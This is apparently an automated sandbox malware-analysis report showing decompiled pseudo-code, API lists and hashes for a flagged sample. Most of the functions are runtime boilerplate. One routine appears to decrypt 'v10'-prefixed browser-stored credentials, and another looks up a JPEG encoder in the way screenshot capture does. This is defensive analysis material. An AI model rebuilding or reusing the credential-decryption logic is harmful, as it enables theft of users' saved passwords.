                                                                                  • Part of subcall function 00C71D0A: __NMSG_WRITE.LIBCMT ref: 00C71D34
                                                                                  • Part of subcall function 00C71D0A: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00C78E57,00000000,00000001,00000000,?,00C73F46,00000018,00DAABD0,0000000C,00C73FD7), ref: 00C71D81
                                                                                • std::bad_alloc::bad_alloc.LIBCMT ref: 00C73146
                                                                                  • Part of subcall function 00C730EE: std::exception::exception.LIBCMT ref: 00C730FA
                                                                                • std::bad_exception::bad_exception.LIBCMTD ref: 00C7315A
                                                                                • __CxxThrowException@8.LIBCMT ref: 00C73168
                                                                                • __FF_MSGBANNER.LIBCMT ref: 00C7317C
                                                                                • __NMSG_WRITE.LIBCMT ref: 00C73184
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 1411284514-0
                                                                                • Opcode ID: ec567da4e810e02f8b054dcb23bd1c4bd5cee814862f3e72b8e76528a9f37eb1
                                                                                • Instruction ID: e2d5c2f43fc93cbd2768e1498baf2834f26788bf0bbe16e9272726c5521cacef
                                                                                • Opcode Fuzzy Hash: ec567da4e810e02f8b054dcb23bd1c4bd5cee814862f3e72b8e76528a9f37eb1
                                                                                • Instruction Fuzzy Hash: BD01F43150474C6BCB247764EC07AAC3BAD9F41324B90C025FC1D955A2DFB5EB85B1BA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E004271BC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				signed int _t15;
                                                                                				LONG* _t21;
                                                                                				void* _t31;
                                                                                				LONG* _t33;
                                                                                				void* _t34;
                                                                                				void* _t35;
                                                                                
                                                                                				_t35 = __eflags;
                                                                                				_t29 = __edx;
                                                                                				_t25 = __ebx;
                                                                                				_push(0xc);
                                                                                				_push(0x443e88);
                                                                                				E00424400(__ebx, __edi, __esi);
                                                                                				_t31 = E00427B66(__edx, __edi, _t35);
                                                                                				_t15 =  *0x447bf0; // 0xfffffffe
                                                                                				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                					E00429078(0xd);
                                                                                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                					 *(_t34 - 0x1c) = _t33;
                                                                                					__eflags = _t33 -  *0x447af8; // 0x37b1658
                                                                                					if(__eflags != 0) {
                                                                                						__eflags = _t33;
                                                                                						if(__eflags != 0) {
                                                                                							__eflags = InterlockedDecrement(_t33);
                                                                                							if(__eflags == 0) {
                                                                                								__eflags = _t33 - 0x4476d0;
                                                                                								if(__eflags != 0) {
                                                                                									E0041E008(_t33);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_t21 =  *0x447af8; // 0x37b1658
                                                                                						 *(_t31 + 0x68) = _t21;
                                                                                						_t33 =  *0x447af8; // 0x37b1658
                                                                                						 *(_t34 - 0x1c) = _t33;
                                                                                						InterlockedIncrement(_t33);
                                                                                					}
                                                                                					 *(_t34 - 4) = 0xfffffffe;
                                                                                					E00427257();
                                                                                				} else {
                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                				}
                                                                                				_t38 = _t33;
                                                                                				if(_t33 == 0) {
                                                                                					E004243E2(_t25, _t29, _t31, _t33, _t38, 0x20);
                                                                                				}
                                                                                				return E00424445(_t33);
                                                                                			}









                                                                                0x004271bc
                                                                                0x004271bc
                                                                                0x004271bc
                                                                                0x004271bc
                                                                                0x004271be
                                                                                0x004271c3
                                                                                0x004271cd
                                                                                0x004271cf
                                                                                0x004271d7
                                                                                0x004271f8
                                                                                0x004271fe
                                                                                0x00427202
                                                                                0x00427205
                                                                                0x00427208
                                                                                0x0042720e
                                                                                0x00427210
                                                                                0x00427212
                                                                                0x0042721b
                                                                                0x0042721d
                                                                                0x0042721f
                                                                                0x00427225
                                                                                0x00427228
                                                                                0x0042722d
                                                                                0x00427225
                                                                                0x0042721d
                                                                                0x0042722e
                                                                                0x00427233
                                                                                0x00427236
                                                                                0x0042723c
                                                                                0x00427240
                                                                                0x00427240
                                                                                0x00427246
                                                                                0x0042724d
                                                                                0x004271df
                                                                                0x004271df
                                                                                0x004271df
                                                                                0x004271e2
                                                                                0x004271e4
                                                                                0x004271e8
                                                                                0x004271ed
                                                                                0x004271f5

                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 004271C8
                                                                                  • Part of subcall function 00427B66: __getptd_noexit.LIBCMT ref: 00427B69
                                                                                  • Part of subcall function 00427B66: __amsg_exit.LIBCMT ref: 00427B76
                                                                                • __amsg_exit.LIBCMT ref: 004271E8
                                                                                • __lock.LIBCMT ref: 004271F8
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00427215
                                                                                • _free.LIBCMT ref: 00427228
                                                                                • InterlockedIncrement.KERNEL32(037B1658), ref: 00427240
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                • String ID:
                                                                                • API String ID: 3470314060-0
                                                                                • Opcode ID: 0041529890f103ef0990be2336a34faa1ed93f03871305a504579e391149f390
                                                                                • Instruction ID: f2ce1a9b575a2c54d66a9ed1b9a2258742c9b1a4d3e183e17d77a931b2947903
                                                                                • Opcode Fuzzy Hash: 0041529890f103ef0990be2336a34faa1ed93f03871305a504579e391149f390
                                                                                • Instruction Fuzzy Hash: FF018E35F09B3197DB20AB25B44575E7760AF04724F91405BF810A7390CB7CAA42CB9E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E0040F07D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t39;
                                                                                				void* _t40;
                                                                                
                                                                                				_push(0);
                                                                                				E00421975(E00435B0A, __ebx, __edi, __esi);
                                                                                				_t39 =  *((intOrPtr*)(_t40 + 8));
                                                                                				 *(_t40 - 4) = 4;
                                                                                				E0041D866(_t39);
                                                                                				_t20 =  *(_t39 + 0x1c);
                                                                                				if( *(_t39 + 0x1c) != 0) {
                                                                                					E0041E008(_t20);
                                                                                				}
                                                                                				 *(_t39 + 0x1c) =  *(_t39 + 0x1c) & 0x00000000;
                                                                                				_t21 =  *(_t39 + 0x14);
                                                                                				if( *(_t39 + 0x14) != 0) {
                                                                                					E0041E008(_t21);
                                                                                				}
                                                                                				 *(_t39 + 0x14) =  *(_t39 + 0x14) & 0x00000000;
                                                                                				_t22 =  *(_t39 + 0xc);
                                                                                				if( *(_t39 + 0xc) != 0) {
                                                                                					E0041E008(_t22);
                                                                                				}
                                                                                				 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0x00000000;
                                                                                				_t23 =  *(_t39 + 4);
                                                                                				if( *(_t39 + 4) != 0) {
                                                                                					E0041E008(_t23);
                                                                                				}
                                                                                				 *(_t39 + 4) =  *(_t39 + 4) & 0x00000000;
                                                                                				 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
                                                                                				return E00421A4D(E0041D5AA(_t39));
                                                                                			}





                                                                                0x0040f07d
                                                                                0x0040f084
                                                                                0x0040f089
                                                                                0x0040f08d
                                                                                0x0040f094
                                                                                0x0040f099
                                                                                0x0040f09f
                                                                                0x0040f0a2
                                                                                0x0040f0a7
                                                                                0x0040f0a8
                                                                                0x0040f0ac
                                                                                0x0040f0b1
                                                                                0x0040f0b4
                                                                                0x0040f0b9
                                                                                0x0040f0ba
                                                                                0x0040f0be
                                                                                0x0040f0c3
                                                                                0x0040f0c6
                                                                                0x0040f0cb
                                                                                0x0040f0cc
                                                                                0x0040f0d0
                                                                                0x0040f0d5
                                                                                0x0040f0d8
                                                                                0x0040f0dd
                                                                                0x0040f0de
                                                                                0x0040f0e2
                                                                                0x0040f0f2

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0040F084
                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040F094
                                                                                  • Part of subcall function 0041D866: _setlocale.LIBCMT ref: 0041D878
                                                                                • _free.LIBCMT ref: 0040F0A2
                                                                                  • Part of subcall function 0041E008: HeapFree.KERNEL32(00000000,00000000,?,00427B57,00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 0041E01E
                                                                                  • Part of subcall function 0041E008: GetLastError.KERNEL32(00000000,?,00427B57,00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 0041E030
                                                                                • _free.LIBCMT ref: 0040F0B4
                                                                                • _free.LIBCMT ref: 0040F0C6
                                                                                • _free.LIBCMT ref: 0040F0D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeH_prolog3HeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                • String ID:
                                                                                • API String ID: 2259855018-0
                                                                                • Opcode ID: a6e686c28c1f0924890c43bf0ea34bdd27091362e41be1f6b6d7a6bb714d0708
                                                                                • Instruction ID: 8996a8b111a2b4f7b9aaad9418afdc69debe712e457b1387b9f5d4f02c748b5e
                                                                                • Opcode Fuzzy Hash: a6e686c28c1f0924890c43bf0ea34bdd27091362e41be1f6b6d7a6bb714d0708
                                                                                • Instruction Fuzzy Hash: 7901A271650B119BE730AF62C40A78BB3E8AF0076DF10842EE445D79C1CB7CE5488B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 57%
                                                                                			E0040F94A(char* __ebx, intOrPtr __ecx, long __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t48;
                                                                                				intOrPtr _t58;
                                                                                				long _t60;
                                                                                				void* _t64;
                                                                                				char* _t68;
                                                                                				void* _t70;
                                                                                				intOrPtr _t74;
                                                                                				int _t84;
                                                                                				void* _t86;
                                                                                
                                                                                				_t81 = __edi;
                                                                                				_t68 = __ebx;
                                                                                				_push(0x74);
                                                                                				E004219DE(E00435FB4, __ebx, __edi, __esi);
                                                                                				_t48 =  *((intOrPtr*)(_t86 + 8));
                                                                                				 *(_t86 - 0x3c) =  *(_t86 - 0x3c) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t86 - 0x34)) = __ecx;
                                                                                				_t70 = 3;
                                                                                				_t83 = __edx;
                                                                                				 *(_t86 - 0x30) = __edx;
                                                                                				 *((intOrPtr*)(_t86 - 0x38)) = _t48;
                                                                                				if(_t48 < _t70) {
                                                                                					L10:
                                                                                					E0040C606(_t68, E0040F8E3(_t48,  *(_t86 - 0x30), 0));
                                                                                				} else {
                                                                                					_t81 = 0x43ec3c;
                                                                                					asm("repe cmpsb");
                                                                                					if(0 != 0) {
                                                                                						goto L10;
                                                                                					} else {
                                                                                						if( *((intOrPtr*)(_t86 + 0xc)) == 0 ||  *((intOrPtr*)(_t86 - 0x34)) == 0) {
                                                                                							 *((intOrPtr*)(_t68 + 0x14)) = 0xf;
                                                                                							 *((intOrPtr*)(_t68 + 0x10)) = 0;
                                                                                							 *_t68 = 0;
                                                                                							goto L8;
                                                                                						} else {
                                                                                							_t84 = 0x40;
                                                                                							E00427E30(_t86 - 0x80, 0, _t84);
                                                                                							_t74 =  *((intOrPtr*)(_t86 - 0x38));
                                                                                							_t58 =  *(_t86 - 0x30) + 3;
                                                                                							 *((intOrPtr*)(_t86 - 0x78)) = _t58;
                                                                                							 *((intOrPtr*)(_t86 - 0x68)) = _t74 + _t58 - 0x13;
                                                                                							_t60 = _t74 - 0x1f;
                                                                                							 *(_t86 - 0x80) = _t84;
                                                                                							 *((intOrPtr*)(_t86 - 0x7c)) = 1;
                                                                                							 *((intOrPtr*)(_t86 - 0x74)) = 0xc;
                                                                                							 *((intOrPtr*)(_t86 - 0x64)) = 0x10;
                                                                                							 *(_t86 - 0x30) = _t60;
                                                                                							_t81 = LocalAlloc(_t84, _t60);
                                                                                							_t83 = 0;
                                                                                							if(_t81 == 0) {
                                                                                								L7:
                                                                                								 *((intOrPtr*)(_t68 + 0x14)) = 0xf;
                                                                                								 *((intOrPtr*)(_t68 + 0x10)) = _t83;
                                                                                								 *_t68 = 0;
                                                                                								L8:
                                                                                								E0040381A(_t68, "NULL");
                                                                                							} else {
                                                                                								_t64 =  *0x44a1e8( *((intOrPtr*)(_t86 - 0x34)),  *((intOrPtr*)(_t86 - 0x74)) +  *((intOrPtr*)(_t86 - 0x78)),  *(_t86 - 0x30), _t86 - 0x80, 0, 0, _t81,  *(_t86 - 0x30), _t86 - 0x30, 0);
                                                                                								_t95 = _t64;
                                                                                								if(_t64 < 0) {
                                                                                									goto L7;
                                                                                								} else {
                                                                                									 *(_t86 - 0x1c) =  *(_t86 - 0x1c) & 0x00000000;
                                                                                									_push(0xf);
                                                                                									 *((intOrPtr*)(_t86 - 0x18)) = 0;
                                                                                									 *((char*)(_t86 - 0x2c)) = 0;
                                                                                									E00403A16(_t86 - 0x2c, _t95, _t81,  *(_t86 - 0x30));
                                                                                									 *(_t86 - 4) =  *(_t86 - 4) & 0x00000000;
                                                                                									 *(__ebx + 0x10) =  *(__ebx + 0x10) & 0x00000000;
                                                                                									 *((intOrPtr*)(__ebx + 0x14)) = 0;
                                                                                									_t83 = _t86 - 0x2c;
                                                                                									_t81 = __ebx;
                                                                                									 *__ebx = 0;
                                                                                									E0040CFB8(__ebx, _t86 - 0x2c);
                                                                                									E00402C34(_t83, 1, 0);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return E00421A61(_t68, _t81, _t83);
                                                                                			}












                                                                                0x0040f94a
                                                                                0x0040f94a
                                                                                0x0040f94a
                                                                                0x0040f951
                                                                                0x0040f956
                                                                                0x0040f959
                                                                                0x0040f95f
                                                                                0x0040f962
                                                                                0x0040f963
                                                                                0x0040f965
                                                                                0x0040f968
                                                                                0x0040f96d
                                                                                0x0040fa76
                                                                                0x0040fa81
                                                                                0x0040f973
                                                                                0x0040f973
                                                                                0x0040f97a
                                                                                0x0040f97c
                                                                                0x00000000
                                                                                0x0040f982
                                                                                0x0040f987
                                                                                0x0040fa68
                                                                                0x0040fa6f
                                                                                0x0040fa72
                                                                                0x00000000
                                                                                0x0040f996
                                                                                0x0040f998
                                                                                0x0040f99f
                                                                                0x0040f9a7
                                                                                0x0040f9aa
                                                                                0x0040f9ad
                                                                                0x0040f9b7
                                                                                0x0040f9ba
                                                                                0x0040f9bf
                                                                                0x0040f9c2
                                                                                0x0040f9c9
                                                                                0x0040f9d0
                                                                                0x0040f9d7
                                                                                0x0040f9e0
                                                                                0x0040f9e2
                                                                                0x0040f9e6
                                                                                0x0040fa4d
                                                                                0x0040fa4d
                                                                                0x0040fa54
                                                                                0x0040fa57
                                                                                0x0040fa5a
                                                                                0x0040fa61
                                                                                0x0040f9e8
                                                                                0x0040fa04
                                                                                0x0040fa0a
                                                                                0x0040fa0c
                                                                                0x00000000
                                                                                0x0040fa0e
                                                                                0x0040fa0e
                                                                                0x0040fa12
                                                                                0x0040fa1c
                                                                                0x0040fa1f
                                                                                0x0040fa23
                                                                                0x0040fa28
                                                                                0x0040fa2c
                                                                                0x0040fa30
                                                                                0x0040fa33
                                                                                0x0040fa36
                                                                                0x0040fa38
                                                                                0x0040fa3b
                                                                                0x0040fa46
                                                                                0x0040fa46
                                                                                0x0040fa0c
                                                                                0x0040f9e6
                                                                                0x0040f987
                                                                                0x0040f97c
                                                                                0x0040fa8d

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040F951
                                                                                • _memset.LIBCMT ref: 0040F99F
                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000074,00410302), ref: 0040F9DA
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$AllocH_prolog3_Local_memset
                                                                                • String ID: NULL$v10
                                                                                • API String ID: 1135815740-1391045996
                                                                                • Opcode ID: c854a48d4a2ddd66d6261875e9f75586a41767216cbd5652a4605086923db5c9
                                                                                • Instruction ID: 2f77f4d33e17d87f15a9b46549870d400b93aa92c64146252089dcebf73b984f
                                                                                • Opcode Fuzzy Hash: c854a48d4a2ddd66d6261875e9f75586a41767216cbd5652a4605086923db5c9
                                                                                • Instruction Fuzzy Hash: 13416E71E01218ABDF24DFA5D885BAEBBB9AF44304F10407EF404AB282C7799904CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E0040E52C(signed int __ecx, intOrPtr* __edi, intOrPtr* _a4) {
                                                                                				signed int _v8;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t17;
                                                                                				signed int _t18;
                                                                                				intOrPtr _t23;
                                                                                				intOrPtr* _t24;
                                                                                				intOrPtr* _t27;
                                                                                				intOrPtr* _t29;
                                                                                				intOrPtr _t30;
                                                                                				intOrPtr* _t31;
                                                                                				signed int _t33;
                                                                                				signed int _t34;
                                                                                				signed int _t37;
                                                                                				intOrPtr* _t40;
                                                                                				intOrPtr* _t41;
                                                                                				signed int _t42;
                                                                                				intOrPtr* _t43;
                                                                                				intOrPtr* _t47;
                                                                                				void* _t51;
                                                                                
                                                                                				_t47 = __edi;
                                                                                				_t37 = __ecx;
                                                                                				_push(__ecx);
                                                                                				_t17 =  *(_a4 + 0x10);
                                                                                				_push(_t33);
                                                                                				_t34 = _t33 | 0xffffffff;
                                                                                				if(_t17 < 0xffffffff) {
                                                                                					_t34 = _t17;
                                                                                				}
                                                                                				_t18 =  *(_t47 + 0x10);
                                                                                				if((_t37 | 0xffffffff) - _t18 <= _t34) {
                                                                                					_t18 = E0041D3B9("string too long");
                                                                                				}
                                                                                				if(_t34 != 0) {
                                                                                					_v8 = _t18 + _t34;
                                                                                					if(E00403AFB(_t34, _t47, _t18 + _t34) != 0) {
                                                                                						_t23 =  *((intOrPtr*)(_t47 + 0x14));
                                                                                						_t51 = 8;
                                                                                						if(_t23 < _t51) {
                                                                                							_t40 = _t47;
                                                                                						} else {
                                                                                							_t40 =  *_t47;
                                                                                						}
                                                                                						if(_t23 < _t51) {
                                                                                							_t24 = _t47;
                                                                                						} else {
                                                                                							_t24 =  *_t47;
                                                                                						}
                                                                                						_t36 = _t34 + _t34;
                                                                                						E0041E250(_t24 + _t34 + _t34, _t40,  *(_t47 + 0x10) +  *(_t47 + 0x10));
                                                                                						_t27 = _a4;
                                                                                						if(_t47 != _t27) {
                                                                                							if( *((intOrPtr*)(_t27 + 0x14)) >= _t51) {
                                                                                								_t27 =  *_t27;
                                                                                							}
                                                                                							if( *((intOrPtr*)(_t47 + 0x14)) < _t51) {
                                                                                								_t41 = _t47;
                                                                                							} else {
                                                                                								_t41 =  *_t47;
                                                                                							}
                                                                                							E00421230(_t41, _t27, _t36);
                                                                                						} else {
                                                                                							_t30 =  *((intOrPtr*)(_t47 + 0x14));
                                                                                							if(_t30 < _t51) {
                                                                                								_t43 = _t47;
                                                                                							} else {
                                                                                								_t43 =  *_t47;
                                                                                							}
                                                                                							if(_t30 < _t51) {
                                                                                								_t31 = _t47;
                                                                                							} else {
                                                                                								_t31 =  *_t47;
                                                                                							}
                                                                                							E0041E250(_t31, _t43, _t36);
                                                                                						}
                                                                                						_t42 = _v8;
                                                                                						 *(_t47 + 0x10) = _t42;
                                                                                						if( *((intOrPtr*)(_t47 + 0x14)) < _t51) {
                                                                                							_t29 = _t47;
                                                                                						} else {
                                                                                							_t29 =  *_t47;
                                                                                						}
                                                                                						 *((short*)(_t29 + _t42 * 2)) = 0;
                                                                                					}
                                                                                				}
                                                                                				return _t47;
                                                                                			}
























                                                                                0x0040e52c
                                                                                0x0040e52c
                                                                                0x0040e52f
                                                                                0x0040e533
                                                                                0x0040e536
                                                                                0x0040e537
                                                                                0x0040e53d
                                                                                0x0040e53f
                                                                                0x0040e53f
                                                                                0x0040e541
                                                                                0x0040e54b
                                                                                0x0040e552
                                                                                0x0040e552
                                                                                0x0040e559
                                                                                0x0040e562
                                                                                0x0040e570
                                                                                0x0040e576
                                                                                0x0040e57b
                                                                                0x0040e57e
                                                                                0x0040e584
                                                                                0x0040e580
                                                                                0x0040e580
                                                                                0x0040e580
                                                                                0x0040e588
                                                                                0x0040e58e
                                                                                0x0040e58a
                                                                                0x0040e58a
                                                                                0x0040e58a
                                                                                0x0040e596
                                                                                0x0040e59c
                                                                                0x0040e5a1
                                                                                0x0040e5a9
                                                                                0x0040e5cf
                                                                                0x0040e5d1
                                                                                0x0040e5d1
                                                                                0x0040e5d6
                                                                                0x0040e5dc
                                                                                0x0040e5d8
                                                                                0x0040e5d8
                                                                                0x0040e5d8
                                                                                0x0040e5e1
                                                                                0x0040e5ab
                                                                                0x0040e5ab
                                                                                0x0040e5b0
                                                                                0x0040e5b6
                                                                                0x0040e5b2
                                                                                0x0040e5b2
                                                                                0x0040e5b2
                                                                                0x0040e5ba
                                                                                0x0040e5c0
                                                                                0x0040e5bc
                                                                                0x0040e5bc
                                                                                0x0040e5bc
                                                                                0x0040e5c5
                                                                                0x0040e5c5
                                                                                0x0040e5e6
                                                                                0x0040e5ec
                                                                                0x0040e5f2
                                                                                0x0040e5f8
                                                                                0x0040e5f4
                                                                                0x0040e5f4
                                                                                0x0040e5f4
                                                                                0x0040e5fc
                                                                                0x0040e5fc
                                                                                0x0040e600
                                                                                0x0040e605

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                • String ID: string too long
                                                                                • API String ID: 1771113911-2556327735
                                                                                • Opcode ID: 0685a29103b4cb48a4660cdfa09c59c41d5c618c14e66b85499d29d6f1d45123
                                                                                • Instruction ID: b7c9fec09c3477a45f8a3c082959292035efc6c769f60ed409a7c864626798bb
                                                                                • Opcode Fuzzy Hash: 0685a29103b4cb48a4660cdfa09c59c41d5c618c14e66b85499d29d6f1d45123
                                                                                • Instruction Fuzzy Hash: 4B216470700211BFC714DF9ACD9196AB3A6AB917683140E3AF415E73C0E778DC61879D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 24%
                                                                                			E00417BCB(void* __edi, void* _a4) {
                                                                                				signed int _v8;
                                                                                				void* _v12;
                                                                                				void* _v16;
                                                                                				void* __esi;
                                                                                				signed int _t21;
                                                                                				signed int _t22;
                                                                                				signed int _t23;
                                                                                				signed int _t27;
                                                                                				char* _t30;
                                                                                				void* _t32;
                                                                                				void* _t33;
                                                                                				intOrPtr _t34;
                                                                                				intOrPtr _t36;
                                                                                				signed int* _t40;
                                                                                
                                                                                				_t21 =  &_v16;
                                                                                				_v16 = 0;
                                                                                				_v12 = 0;
                                                                                				__imp__GdipGetImageEncodersSize(_t21,  &_v12);
                                                                                				if(_v12 != 0) {
                                                                                					_t22 = E0041E042(_t32, __edi, 0, _v12);
                                                                                					_t27 = _t22;
                                                                                					if(_t27 != 0) {
                                                                                						__imp__GdipGetImageEncoders(_v16, _v12, _t27, __edi);
                                                                                						_t36 = _v16;
                                                                                						_v8 = 0;
                                                                                						if(_t36 <= 0) {
                                                                                							L15:
                                                                                							_t23 = _t22 | 0xffffffff;
                                                                                							L16:
                                                                                							L17:
                                                                                							return _t23;
                                                                                						}
                                                                                						_t11 = _t27 + 0x30; // 0x30
                                                                                						_t40 = _t11;
                                                                                						do {
                                                                                							_t22 =  *_t40;
                                                                                							_t30 = L"image/jpeg";
                                                                                							while(1) {
                                                                                								_t33 =  *_t22;
                                                                                								if(_t33 !=  *_t30) {
                                                                                									break;
                                                                                								}
                                                                                								if(_t33 == 0) {
                                                                                									L11:
                                                                                									_t22 = 0;
                                                                                									L13:
                                                                                									if(_t22 == 0) {
                                                                                										asm("movsd");
                                                                                										asm("movsd");
                                                                                										asm("movsd");
                                                                                										asm("movsd");
                                                                                										E0041E008(_t27);
                                                                                										_t23 = _v8;
                                                                                										goto L16;
                                                                                									}
                                                                                									goto L14;
                                                                                								}
                                                                                								_t34 =  *((intOrPtr*)(_t22 + 2));
                                                                                								if(_t34 != _t30[2]) {
                                                                                									break;
                                                                                								}
                                                                                								_t22 = _t22 + 4;
                                                                                								_t30 =  &(_t30[4]);
                                                                                								if(_t34 != 0) {
                                                                                									continue;
                                                                                								}
                                                                                								goto L11;
                                                                                							}
                                                                                							asm("sbb eax, eax");
                                                                                							asm("sbb eax, 0xffffffff");
                                                                                							goto L13;
                                                                                							L14:
                                                                                							_v8 = _v8 + 1;
                                                                                							_t40 =  &(_t40[0x13]);
                                                                                						} while (_v8 < _t36);
                                                                                						goto L15;
                                                                                					}
                                                                                					_t23 = _t22 | 0xffffffff;
                                                                                					goto L17;
                                                                                				}
                                                                                				return _t21 | 0xffffffff;
                                                                                			}

















                                                                                0x00417bd6
                                                                                0x00417bdc
                                                                                0x00417bdf
                                                                                0x00417be2
                                                                                0x00417beb
                                                                                0x00417bf6
                                                                                0x00417bfb
                                                                                0x00417c00
                                                                                0x00417c0f
                                                                                0x00417c15
                                                                                0x00417c18
                                                                                0x00417c1d
                                                                                0x00417c63
                                                                                0x00417c63
                                                                                0x00417c66
                                                                                0x00417c67
                                                                                0x00000000
                                                                                0x00417c67
                                                                                0x00417c1f
                                                                                0x00417c1f
                                                                                0x00417c22
                                                                                0x00417c22
                                                                                0x00417c24
                                                                                0x00417c29
                                                                                0x00417c29
                                                                                0x00417c2f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00417c34
                                                                                0x00417c4b
                                                                                0x00417c4b
                                                                                0x00417c54
                                                                                0x00417c56
                                                                                0x00417c76
                                                                                0x00417c77
                                                                                0x00417c78
                                                                                0x00417c7a
                                                                                0x00417c7b
                                                                                0x00417c80
                                                                                0x00000000
                                                                                0x00417c83
                                                                                0x00000000
                                                                                0x00417c56
                                                                                0x00417c36
                                                                                0x00417c3e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00417c40
                                                                                0x00417c43
                                                                                0x00417c49
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00417c49
                                                                                0x00417c4f
                                                                                0x00417c51
                                                                                0x00000000
                                                                                0x00417c58
                                                                                0x00417c58
                                                                                0x00417c5b
                                                                                0x00417c5e
